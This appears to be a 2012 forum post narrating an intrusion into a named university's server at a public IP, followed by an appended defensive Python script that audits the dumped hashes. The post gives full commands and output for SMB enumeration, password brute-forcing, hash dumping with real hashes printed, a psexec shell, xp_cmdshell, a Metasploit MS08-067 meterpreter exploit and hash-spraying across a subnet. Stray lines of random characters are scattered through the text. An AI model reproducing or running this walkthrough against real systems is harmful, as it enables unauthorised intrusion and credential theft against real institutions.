nmap + msf intrusion of Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
+ S5 p2 C! @  g% a
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
) E6 O$ ~- _$ [2 A9 P7 w4 A
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
5 I$ w5 X1 P( V( h* _" @) A0 Y/ X/ M# _
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.2418)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
6 S2 }7 r3 w* o3 I& z, F* \6 e
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
2 Z: w, g8 }# `, {& [+ \4 j) d
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
! s8 F3 W# I* T7 y* p/ U, x8 Z. W
root@bt:~# msfconsole   // use msf to exploit the MS08-067 vulnerability against the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)

msf  exploit(ms08_067_netapi) > sessions -l
, K! E& p7 B0 |' Z4 `4 \; P& [+ O2 M: z2 W
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hashes to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful: a simple msf + nmap attack~~
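Added example (editor's code, not part of the original post): the smb-pwdump output above is exactly what an administrator should run an audit over before anyone else does. The script below parses pwdump-format lines, using the four account lines from the post as its sample input, and flags the three things that made this host trivial to take over: blank passwords, LM hashes still being stored (LM is case-insensitive and split into two 7-character halves, so it is far weaker than NT), and the tell-tale empty second LM half that shows a password is at most 7 characters long. The empty-string LM and NT hash constants are public knowledge; the function names, the regex and the "svc" sample account used in the usage note are my own.

```python
import re

# Public constants: the LM hash of the empty string is AAD3B435B51404EE
# repeated twice, and the NT hash of the empty string is
# 31D6CFE0D16AE931B73C59D7E0C089C0. pwdump prints "NO PASSWORD****..."
# in place of either hash when it equals the empty-string value.
EMPTY_LM_HALF = "AAD3B435B51404EE"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"

# One pwdump-style line: "| user:rid => LMHASH:NTHASH". The leading "| " or
# "|_" is the NSE output prefix and is optional (plain pwdump files lack it).
LINE_RE = re.compile(
    r"^\|?_?\s*(?P<user>[^:|]+):(?P<rid>\d+)\s*=>\s*(?P<lm>[^:]+):(?P<nt>[^:]+?)\s*$"
)

# Sample input copied from the smb-pwdump output in the post above.
SAMPLE_PWDUMP = """\
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""


def normalise_hash(value):
    """Return the hash in upper case, or None when pwdump marked it as empty."""
    value = value.strip().upper()
    return None if value.startswith("NO PASSWORD") else value


def audit_pwdump(output):
    """Map each account in pwdump-format output to a list of findings."""
    report = {}
    for line in output.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue  # header lines such as "| smb-pwdump:" carry no account
        user, rid = match["user"].strip(), int(match["rid"])
        lm, nt = normalise_hash(match["lm"]), normalise_hash(match["nt"])
        findings = []
        # pwdump's NO PASSWORD marker, or the literal empty-string NT hash,
        # both mean the account has a blank password.
        if nt is None or nt == EMPTY_NT:
            findings.append("blank password")
        # Any real LM hash means LM storage is still enabled on this host.
        if lm is not None and lm != EMPTY_LM:
            findings.append("LM hash stored")
            # LM pads the password to 14 bytes and hashes each 7-byte half
            # separately, so an empty second half means 7 characters or fewer.
            if lm.endswith(EMPTY_LM_HALF):
                findings.append("password is 7 characters or fewer")
        # RID 500 is the built-in Administrator; weaknesses there matter most.
        if rid == 500 and findings:
            findings.append("built-in Administrator account")
        report[user] = findings
    return report


def accounts_with_blank_password(report):
    """Sorted names of accounts the report flags as having a blank password."""
    return sorted(u for u, f in report.items() if "blank password" in f)


if __name__ == "__main__":
    for user, findings in audit_pwdump(SAMPLE_PWDUMP).items():
        print(f"{user}: {', '.join(findings) or 'no findings'}")
```

Run against the sample, the audit flags Administrator and Guest as blank-password accounts (the same two the smb-brute run found), reports that test's LM hash ends in the empty half (consistent with the six-character password the brute force recovered), and shows LM storage is enabled for every account with a real password. On a real Windows host the fixes are the usual ones: set the passwords, disable the Guest account, enable the "do not store LAN Manager hash" policy and force a password change so the stored LM hashes are dropped.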
4 v1 P4 O3 [( V; p4 O; n) x